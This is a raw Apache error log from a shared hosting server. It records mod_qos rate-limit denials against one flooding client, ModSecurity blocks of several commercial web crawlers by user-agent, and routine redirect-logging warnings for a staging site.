[Tue May 26 19:59:12.749026 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrGwAAAH8
[Tue May 26 19:59:12.751187 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrHAAAACQ
[Tue May 26 19:59:12.753852 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrHQAAAAg
[Tue May 26 19:59:12.754972 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrHgAAAAM
[Tue May 26 19:59:12.756802 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrHwAAAC4
[Tue May 26 19:59:12.758549 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrIAAAAGs
[Tue May 26 19:59:12.759103 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOEqK9k_ZUB2Vp251RAAAAco
[Tue May 26 19:59:12.759155 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuOEqK9k_ZUB2Vp251RQAAAZM
[Tue May 26 19:59:12.762594 2026] [qos:error] [pid 93868:tid 94376] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOEqK9k_ZUB2Vp251RgAAAgU
[Tue May 26 19:59:12.897396 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrJQAAAEE
[Tue May 26 19:59:12.897399 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrJAAAAH4
[Tue May 26 19:59:12.905061 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrJgAAAFo
[Tue May 26 19:59:12.905131 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrJwAAAFY
[Tue May 26 19:59:12.908821 2026] [qos:error] [pid 93868:tid 94309] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOEqK9k_ZUB2Vp251TgAAAcI
[Tue May 26 19:59:12.909054 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrKAAAAH0
[Tue May 26 19:59:12.911135 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrKQAAAC8
[Tue May 26 19:59:12.911221 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrKgAAACU
[Tue May 26 19:59:12.912228 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOEqK9k_ZUB2Vp251UAAAAd4
[Tue May 26 19:59:12.912354 2026] [security2:error] [pid 93576:tid 93783] [client 114.119.157.231:25199] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.xllent.in"] [uri "/discountsalepage292e211ghu335753.php"] [unique_id "ahWuOGDRMqfxdEDkoszrKwAAAEc"], referer: http://www.xllent.in/discountsalepage292e211ghu335753.php?id=chenbro-26h113215030-600mm-36pin-minisas-sff8087-to-sff8087-cable-bulk-p-11274.html
[Tue May 26 19:59:12.918656 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOEqK9k_ZUB2Vp251UQAAAfA
[Tue May 26 19:59:13.045942 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrLgAAAGU
[Tue May 26 19:59:13.053312 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrLwAAAF0
[Tue May 26 19:59:13.055773 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrMAAAAHE
[Tue May 26 19:59:13.058435 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251VwAAAZ0
[Tue May 26 19:59:13.059673 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrMQAAAFk
[Tue May 26 19:59:13.062668 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrMgAAAHI
[Tue May 26 19:59:13.063045 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrMwAAAAs
[Tue May 26 19:59:13.067057 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251WAAAAaI
[Tue May 26 19:59:13.067402 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrNAAAAC0
[Tue May 26 19:59:13.074674 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251WQAAAZw
[Tue May 26 19:59:13.197375 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrOAAAAAE
[Tue May 26 19:59:13.202611 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrOQAAAH8
[Tue May 26 19:59:13.204851 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrOgAAACQ
[Tue May 26 19:59:13.208965 2026] [qos:error] [pid 93868:tid 94315] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251XgAAAcg
[Tue May 26 19:59:13.213928 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrOwAAAAg
[Tue May 26 19:59:13.215655 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrPAAAAAM
[Tue May 26 19:59:13.218570 2026] [qos:error] [pid 93868:tid 94258] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251XwAAAY8
[Tue May 26 19:59:13.220621 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrPQAAAC4
[Tue May 26 19:59:13.221154 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrPgAAAGs
[Tue May 26 19:59:13.229982 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251YAAAAfc
[Tue May 26 19:59:13.259918 2026] [security2:error] [pid 93868:tid 94320] [client 114.119.142.12:39179] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/features/rows-columns"] [unique_id "ahWuOUqK9k_ZUB2Vp251ZAAAAc0"], referer: https://www.anujoverseas.in/features/rows-columns
[Tue May 26 19:59:13.275013 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250yAAAAZo"]
[Tue May 26 19:59:13.285671 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqkgAAADE"]
[Tue May 26 19:59:13.286722 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250vAAAAeI"]
[Tue May 26 19:59:13.291547 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqlgAAABI"]
[Tue May 26 19:59:13.297864 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqlwAAAHA"]
[Tue May 26 19:59:13.312662 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250xAAAAcQ"]
[Tue May 26 19:59:13.317898 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqswAAAHY"]
[Tue May 26 19:59:13.318425 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp2501QAAAbU"]
[Tue May 26 19:59:13.319089 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqqQAAAEQ"]
[Tue May 26 19:59:13.319547 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp2504AAAAaw"]
[Tue May 26 19:59:13.322161 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250zgAAAdg"]
[Tue May 26 19:59:13.322560 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp2503wAAAbI"]
[Tue May 26 19:59:13.324209 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqtQAAAB4"]
[Tue May 26 19:59:13.325403 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq1wAAAFE"]
[Tue May 26 19:59:13.327678 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp2501gAAAe0"]
[Tue May 26 19:59:13.333114 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq2wAAAFQ"]
[Tue May 26 19:59:13.341874 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp2503AAAAZU"]
[Tue May 26 19:59:13.345167 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250wQAAAd8"]
[Tue May 26 19:59:13.374108 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq2AAAACo"]
[Tue May 26 19:59:13.375174 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq3wAAAF4"]
[Tue May 26 19:59:13.375664 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq3gAAAB8"]
[Tue May 26 19:59:13.378320 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq4QAAADM"]
[Tue May 26 19:59:13.382841 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp2507AAAAgY"]
[Tue May 26 19:59:13.407883 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq3QAAABE"]
[Tue May 26 19:59:13.408051 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq3AAAAG8"]
[Tue May 26 19:59:13.414979 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq4AAAAEg"]
[Tue May 26 19:59:13.434879 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251IwAAAdc"]
[Tue May 26 19:59:13.439754 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251GQAAAeo"]
[Tue May 26 19:59:13.447090 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOEqK9k_ZUB2Vp251MAAAAes"]
[Tue May 26 19:59:13.455801 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOGDRMqfxdEDkoszq5wAAADg"]
[Tue May 26 19:59:13.537064 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOUqK9k_ZUB2Vp251rgAAAcU
[Tue May 26 19:59:13.537472 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOUqK9k_ZUB2Vp251rQAAAfY
[Tue May 26 19:59:13.539918 2026] [qos:error] [pid 93868:tid 94349] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOUqK9k_ZUB2Vp251sAAAAeo
[Tue May 26 19:59:13.557471 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251tAAAAfI
[Tue May 26 19:59:13.564227 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszraAAAAHw
[Tue May 26 19:59:13.567520 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251twAAAZs
[Tue May 26 19:59:13.585579 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251uQAAAZI
[Tue May 26 19:59:13.589089 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszraQAAAFQ
[Tue May 26 19:59:13.599508 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrawAAADs
[Tue May 26 19:59:13.610291 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251uwAAAdc
[Tue May 26 19:59:13.688901 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrbAAAAH4
[Tue May 26 19:59:13.690343 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251wAAAAdE
[Tue May 26 19:59:13.691101 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrbQAAABA
[Tue May 26 19:59:13.707180 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251wgAAAZs
[Tue May 26 19:59:13.716011 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrbwAAAH0
[Tue May 26 19:59:13.719060 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251wwAAAdc
[Tue May 26 19:59:13.733076 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251xAAAAbo
[Tue May 26 19:59:13.736910 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrcAAAAFk
[Tue May 26 19:59:13.749489 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOWDRMqfxdEDkoszrcQAAAF4
[Tue May 26 19:59:13.764106 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOUqK9k_ZUB2Vp251xwAAAe8
